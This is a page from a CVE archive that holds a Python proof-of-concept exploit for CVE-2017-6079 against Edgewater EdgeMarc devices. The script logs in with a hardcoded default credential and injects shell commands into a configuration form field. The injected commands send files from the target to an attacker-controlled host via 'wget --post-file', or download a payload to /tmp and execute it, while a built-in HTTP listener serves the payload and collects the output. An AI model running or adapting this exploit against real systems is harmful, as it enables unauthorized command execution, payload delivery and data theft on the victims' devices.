4837 Total CVEs
26 Years
GitHub
Home / 2017 / CVE-2017-6079
README.md
Rendering markdown...
POC / CVE-2017-6079.py PY
⬇ Raw GitHub ✕ Close 
import requests
import socket
import thread
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
import sys
import shutil 
import os 
import random
import string

HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'

class RequestHandler(BaseHTTPRequestHandler):
    
    def do_GET(self):
        
        #request_path = self.path
        global data_flag
        print OKGREEN
        print "[#] Target Connected"
        print "[#] Uploading %s"%(self.path)
        if os.access(os.curdir + os.sep + self.path, os.R_OK):
            f = open(os.curdir + os.sep + self.path,'rb') #self.path has /test.html
            self.send_response(200)
            self.send_header('Content-type', 'application/zip')
            self.end_headers()
            self.wfile.write(f.read())
            f.close()
            
        else:
            print FAIL
            print "requested file is not in Current Working Dir, Plz move it there !!"
            print ENDC
        data_flag = True
    def do_POST(self):
        global data_flag
        request_path = self.path
        
        print OKGREEN
        print "[#] Output Received ",ENDC
        #print(request_path)
        
        request_headers = self.headers
        content_length = request_headers.getheaders('content-length')
        length = int(content_length[0]) if content_length else 0
        
        #print(request_headers)
        print OKGREEN
        print(self.rfile.read(length))
        print ENDC
        #print("<----- Request End -----\n")
        data_flag = True
        self.send_response(200)
    def log_request(self, code='-', size='-'):
        pass
    
    #do_PUT = do_POST
    #do_DELETE = do_GET
        
def listener():
    global server

    port = 80
    #print('Listening on localhost:%s' % port)
    server = HTTPServer(('', port), RequestHandler)
    server.serve_forever()
    #print "1"

def read_file(TargetIP,AttackerIP,FilePath):
    auth = {"Authorization": "Basic cm9vdDpkZWZhdWx0"}
    payload = {
    "mainFormSubmitAction":"",
    "udefsEntries":"wget --post-file %s http://%s"%(FilePath,AttackerIP),
    "applyConfig":"1",
    "saveConfig":""
    }

    print OKBLUE
    print "[*] Reading '%s'"%(FilePath),ENDC
    r  = requests.post("http://%s/cgi-bin/config?page=50&form=mainForm"%(TargetIP),headers=auth,data=payload)#, proxies=proxyDict)

def upload_file(TargetIP,AttackerIP,FileName):
    global payload_name
    payload_name = ''.join(random.choice(string.ascii_uppercase) for _ in range(5))
    auth = {"Authorization": "Basic cm9vdDpkZWZhdWx0"}
    payload = {
    "mainFormSubmitAction":"",
    "udefsEntries":"wget -O /tmp/%s http://%s/%s"%(payload_name,AttackerIP,FileName),
    "applyConfig":"1",
    "saveConfig":""
    }
    print OKBLUE
    print "[*] Forcing the target to connect to us ",ENDC
    #print OKBLUE,"[*] Reading '%s'"%(FilePath),ENDC
    r  = requests.post("http://%s/cgi-bin/config?page=50&form=mainForm"%(TargetIP),headers=auth,data=payload)#, proxies=proxyDict)

def execute_payload(TargetIP):
    auth = {"Authorization": "Basic cm9vdDpkZWZhdWx0"}
    payload = {
    "mainFormSubmitAction":"",
    "udefsEntries":"chmod 755 /tmp/%s\n/tmp/%s"%(payload_name,payload_name),
    "applyConfig":"1",
    "saveConfig":""
    }

    #print OKBLUE,"[*] Reading '%s'"%(FilePath),ENDC
    r  = requests.post("http://%s/cgi-bin/config?page=50&form=mainForm"%(TargetIP),headers=auth,data=payload)#, proxies=proxyDict)

def print_banner():
    print FAIL,"""

 _____    _                          _
| ____|__| | __ _  _____      ____ _| |_ ___ _ __
|  _| / _` |/ _` |/ _ \ \ /\ / / _` | __/ _ \ '__|
| |__| (_| | (_| |  __/\ V  V / (_| | ||  __/ |
|_____\__,_|\__, |\___| \_/\_/ \__,_|\__\___|_|
            |___/
 _____    _
| ____|__| | __ _  ___ _ __ ___   __ _ _ __ ___
|  _| / _` |/ _` |/ _ \ '_ ` _ \ / _` | '__/ __|
| |__| (_| | (_| |  __/ | | | | | (_| | | | (__
|_____\__,_|\__, |\___|_| |_| |_|\__,_|_|  \___|
            |___/
 _____            _       _ _
| ____|_  ___ __ | | ___ (_) |_
|  _| \ \/ / '_ \| |/ _ \| | __|
| |___ >  <| |_) | | (_) | | |_
|_____/_/\_\ .__/|_|\___/|_|\__|
           |_|


                 Edgewater Edgemarc Exploit CVE-2017-6079
                 Coded By: Mostafa Soliman""",ENDC
def usage():
    print """
    [USAGE] %s [operation] [TargetIP] [AttackerIP] [FilePath]
    operation: Either read / upload
    AttackerIP: IP address to receive the connection on
    TargetIP: IP address of the target running Edgewater Edgemarc server
    FilePath:  Remote file to download in case of "read" operation
               Local file to upload in case of "upload" operation
    """%(sys.argv[0])
    exit()
def main():
    global data_flag
    print_banner()
    data_flag = False
    if len(sys.argv) !=5:
        usage()
    operation = sys.argv[1]
    TargetIP = sys.argv[2]
    AttackerIP = sys.argv[3]
    FilePath = sys.argv[4]

    if "upload" != operation.lower() and "read" != operation.lower():
        print FAIL,"Wrong Operation",ENDC
        usage()
    thread.start_new_thread( listener ,())

    if "read" == operation.lower():
        
        read_file(TargetIP,AttackerIP,FilePath)
        while not data_flag:
            pass
        server.shutdown()
    elif "upload" == operation.lower():
        upload_file(TargetIP,AttackerIP,FilePath.split("/")[-1])
        #copy the file to the cwd
        #shutil.move(FilePath, os.path.join(".", filename))
        while not data_flag:
            pass
        server.shutdown()
        print "[#] Executing The Payload",ENDC
        execute_payload(TargetIP)

    
if __name__ == "__main__":

    
    main()